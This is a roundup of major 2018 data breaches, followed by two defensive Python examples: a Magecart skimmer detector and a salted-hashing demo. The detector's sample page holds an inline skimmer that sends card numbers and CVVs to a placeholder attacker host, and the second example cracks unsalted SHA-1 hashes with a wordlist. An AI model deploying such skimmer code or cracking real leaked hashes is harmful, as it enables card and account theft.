Where to start? In 2018 the mantra became “another day, another data breach.” As a result, consumers and researchers alike are feeling “breach fatigue” and getting a bit numb to the headline. But the reality is, cybercriminals are going after personal information, credit card info and passwords every single day. The sheer number of data exposures we saw this year – through hacks, misconfigurations and other human error – should be setting off alarm bells for everyone. Companies and individuals shouldn’t tune out, but should rather leap into the breach, as it were, with proactive security practices to safeguard the information they’re in charge of.
Here’s a look at some of the top breach stories of the year – and the number of people affected.
- [Google+ – 52.5 Million] A pair of software vulnerabilities and the resulting privacy scandal spelled curtains this year for Google’s consumer social network, Google+. First, Google’s own internal security team discovered this spring that a bug in a Google+ API had allowed outside developers to access private profile data for roughly three years. Google chose not to disclose it, which led to plenty of bad publicity when the Wall Street Journal reported it in October. As if that weren’t bad enough, a second API bug surfaced in November: apps that had been granted permission to view a user’s Google+ profile information could read profile fields even when the user had set them to not-public. Google said that second bug alone affected about 52.5 million users.
- [The Magecart Hits – Untold Millions] Magecart was a busy bee throughout the year, knocking over a string of websites, Ticketmaster among them, with its digital card skimmers. Magecart, an umbrella name for several crime groups, injects JavaScript into e-commerce sites, either directly or by compromising a third-party script supplier those sites load, and uses it to copy whatever shoppers type into online payment forms. The approach has been devastatingly effective: Ticketmaster, British Airways, Newegg, Feedify, Shopper Approved, VisionDirect, the list goes on and on. And in December, Magecart added the ability to steal site administrator credentials to the mix.
- [Marriott Hotels – 500 Million] Marriott in November revealed that data on up to 500 million guests had been exposed and available for the taking since 2014. Hackers gained access to the Starwood reservation database and lifted a social engineer’s dreamboat package: name, mailing address, phone number, email address, passport number, Starwood Preferred Guest account information, date of birth, gender, arrival and departure information, reservation date and communication preferences. For some guests the data also included payment card numbers and expiration dates; the card numbers were encrypted, but Marriott said it could not rule out that the material needed to decrypt them had been taken as well. Starwood, whose brands include St. Regis and Sheraton, was bought by Marriott in 2016.
- [Under Armour/MyFitnessPal – 150 Million] Fitness apparel firm Under Armour in March said 150 million users of its popular MyFitnessPal app were affected after hackers accessed user names, email addresses and hashed passwords. The company received kudos for its speedy notification process: it started notifying victims four days after discovering the compromise. However, it also drew criticism because a portion of the passwords had been hashed with SHA-1, a fast general-purpose hash rather than a slow, salted password-hashing function such as bcrypt, which leaves those hashes far more exposed to dictionary and brute-force attacks.
- [The Girl Scouts – 2,800] This one was by no means the biggest, but we’re including it because it caught the interest of many. In October, Girl Scouts of Orange County (GSOC) in California said it was hacked. An attacker gained access to an email account used by the council, then used it to send out emails of his or her own. While GSOC didn’t elaborate on the type of emails, presumably this was part of a phishing effort. The deeper issue is that the account had been used to coordinate travel for members in the past, according to GSOC, so it’s possible that the adversary rifled through the inbox and found personal information for as many as 2,800 girls and their families. The cookies were safe, though.
- [Facebook and More Facebook – 70+ Million] The social network has not had a good run, to put it mildly. In May, a Facebook software bug switched the suggested audience for new posts to “public” for 14 million users, so people who thought they were sharing with just friends or small groups actually posted to the world. In September, Facebook said that hackers had exploited a flaw in its “View As” feature to steal the access tokens of almost 50 million accounts, tokens that would let the thieves log in as those users. And in December, Facebook disclosed a bug that enabled third-party apps to access unpublished photos of 6.8 million users.
- [NASA Data Blasts Off – Numbers TBD] NASA in December admitted that an unauthorized intruder had broken into one of its servers back in October and that personally identifiable information for thousands of employees was compromised, including Social Security numbers. The server in question was apparently an HR database: those affected are NASA civil service employees who were hired, left the agency or transferred between July 2006 and October 2018, i.e. 12 years’ worth of records. NASA isn’t sure of the scope yet, but the amount of information exfiltrated is potentially significant.
- [T-Mobile – 2.3 Million] In August, wireless carrier T-Mobile alerted millions of its customers to a breach of its website that resulted in subscriber names, zip codes, phone numbers, email addresses and account numbers being stolen. The alert went to 77 million customers, but only 3 percent of subscribers were affected, totaling about 2.3 million. A T-Mobile spokesperson told Threatpost at the time that the attack targeted a specific leaky API tied to an undisclosed part of its website.
- [Ticketfly – 26 Million] Ticketfly, the events ticketing company, joined its rival, Ticketmaster, in breachland in June. Customers who went to Ticketfly’s homepage during the incident found a picture posted with the title “Ticketfly HacKeD By IsHaKdZ” that said [sic]: “Your Security Down im Not Sorry… Next time I will publish database ‘backstage.'” According to a report, the hacker notified Ticketfly about a vulnerability enabling the data breach, and then asked for one bitcoin (around $7,500 at the time) in exchange for the information. What that information consisted of hasn’t been confirmed by the company.
- [Orbitz – 880,000] Expedia-owned travel site Orbitz in March said that both its consumer and partner booking platforms were compromised, exposing about 880,000 payment cards (the current Orbitz.com website was not affected; the breach hit a legacy platform). The consumer platform was open to attack during the first half of 2016, while the partner platform was exposed for almost two years, between Jan. 1, 2016 and Dec. 22, 2017, according to Expedia. The data exposed included payment card numbers along with the cardholder names, phone numbers, email and billing addresses attached to them. Passwords are notably absent from the list.
- [Quora – 100 Million] Crowdsourced query site Quora in December found itself asking “what happened?” in the wake of a massive data breach that impacted up to 100 million of its users. Marriott aside, the incident has the dubious honor of being the biggest breach on our list (unless you combine Cambridge Analytica’s totals with Facebook’s other “issues”). The hack exposed user names, email addresses, hashed passwords, direct-message content and data imported from any networks users had linked to their accounts, such as Facebook or Twitter. It also handed the thieves a treasure trove of social engineering and profiling fodder: questions, answers, answer requests, comments, upvotes and downvotes.
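The Magecart entry above describes the skimmer technique in prose. Here is an added example, not code from the original article or from any of the affected sites, of the check a practitioner would run against a checkout page: it scans the page’s HTML for third-party scripts loaded without a Subresource Integrity hash (the compromised-supplier route) and for inline scripts that both reference payment fields and send data to an external host (the form-grabbing route). The sample HTML, every hostname in it (shop.example.com and the rest), the placeholder SRI hash and the regex heuristics are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample checkout page (hypothetical; not taken from any real site).
# It carries one first-party script, one CDN script pinned with a placeholder
# SRI hash, one unpinned third-party script and one inline snippet shaped like
# a form-grabbing skimmer.
SAMPLE_CHECKOUT_HTML = """
<html><body>
<form id="payment"><input name="cardNumber"><input name="cvv"></form>
<script src="/static/checkout.js"></script>
<script src="https://cdn.example-cdn.net/lib/ui.min.js"
        integrity="sha384-AAAA" crossorigin="anonymous"></script>
<script src="https://stats.example-widget.com/track.js"></script>
<script>
document.getElementById('payment').addEventListener('submit', function () {
  var d = {n: document.querySelector('[name=cardNumber]').value,
           c: document.querySelector('[name=cvv]').value};
  new Image().src = 'https://cdn-assets.example-bad.net/p?d=' + btoa(JSON.stringify(d));
});
</script>
</body></html>
"""

_SCRIPT = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
_ATTR = re.compile(r"""(\w[\w-]*)\s*=\s*(?:"([^"]*)"|'([^']*)')""")
# Heuristic indicators; extend them with the field names your own forms use.
_PAYMENT_FIELD = re.compile(r"card ?number|cc-?num|cvv|cvc|expir", re.I)
_EXFIL_SINK = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon\(|new Image\(\)|\.src\s*=", re.I)
_EXTERNAL_URL = re.compile(r"https?://([\w.-]+)", re.I)


def _attrs(raw):
    """Parse the attribute string of a <script> tag into a lowercase-keyed dict."""
    out = {}
    for m in _ATTR.finditer(raw):
        out[m.group(1).lower()] = m.group(2) if m.group(2) is not None else m.group(3)
    return out


def audit_checkout_scripts(html, first_party_host):
    """Return findings, in document order, for Magecart-style indicators."""
    findings = []
    for raw_attrs, body in _SCRIPT.findall(html):
        attrs = _attrs(raw_attrs)
        src = attrs.get("src")
        if src:
            host = urlparse(src).hostname
            # A third-party script with no SRI hash can be swapped for a
            # skimmer by whoever controls that host (the supplier route).
            if host and host != first_party_host and "integrity" not in attrs:
                findings.append({"kind": "unpinned_third_party_script", "detail": src})
            continue
        # Inline script: flag only when it touches payment fields AND uses a
        # network sink AND names a host other than our own.
        external = {h for h in _EXTERNAL_URL.findall(body) if h != first_party_host}
        if _PAYMENT_FIELD.search(body) and _EXFIL_SINK.search(body) and external:
            findings.append({"kind": "inline_skimmer_pattern",
                             "detail": ", ".join(sorted(external))})
    return findings


if __name__ == "__main__":
    for f in audit_checkout_scripts(SAMPLE_CHECKOUT_HTML, "shop.example.com"):
        print(f["kind"], "->", f["detail"])
```

Regex heuristics like these only catch the obvious cases. The structural defences are a Content-Security-Policy that restricts both script sources and the hosts a page may connect to, an SRI hash on every third-party script so a modified copy fails to load, and keeping the payment page itself as free of third-party scripts as possible.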
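Both the Under Armour and Quora entries turn on how the stolen passwords were hashed. The following added example, not code from the article or from either company, shows why a fast hash like SHA-1 is the wrong choice: with no salt, one pass over a wordlist cracks every user who picked a common password, whereas a salted, iterated password hash forces the attacker to redo the work per user and per guess. The leaked “database” and the wordlist are constructed, and PBKDF2-HMAC-SHA256 from the standard library stands in for bcrypt, scrypt or Argon2, which need third-party packages.

```python
import hashlib
import hmac
import os

# Constructed wordlist (a real cracking run uses hundreds of millions of entries).
WORDLIST = ["password", "123456", "fitness2018", "letmein", "qwerty"]


def sha1_hex(password):
    """Unsalted SHA-1, the kind of scheme criticised in the Under Armour case."""
    return hashlib.sha1(password.encode()).hexdigest()


# Constructed leak: what an attacker holds after dumping a SHA-1 password table.
LEAKED_SHA1 = {
    "alice": sha1_hex("fitness2018"),
    "bob": sha1_hex("123456"),
    "carol": sha1_hex("correct horse battery staple"),
}


def crack_unsalted_sha1(leaked, wordlist):
    """Hash the wordlist once, then match every user against that one table."""
    table = {sha1_hex(w): w for w in wordlist}
    # Identical passwords give identical digests when nothing is salted, so a
    # single table lookup serves every account at once.
    return {user: table[digest] for user, digest in leaked.items() if digest in table}


def pbkdf2_store(password, iterations=200_000, salt=None):
    """Salted, iterated hash in a self-describing 'algo$iters$salt$hash' string."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format: " + algo)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("cracked from unsalted SHA-1:", crack_unsalted_sha1(LEAKED_SHA1, WORDLIST))
    a, b = pbkdf2_store("fitness2018"), pbkdf2_store("fitness2018")
    print("same password, different records:", a != b)
    print("verify correct / wrong:", pbkdf2_verify("fitness2018", a),
          pbkdf2_verify("fitness2019", a))
```

With a per-user salt the attacker’s precomputed table is useless and every guess costs the full iteration count for every account; bcrypt, scrypt and Argon2 are preferred in production because they add a memory cost that blunts GPU parallelism as well. Carol’s long passphrase survives the dictionary pass even under SHA-1, which is the user-side lesson: length beats cleverness.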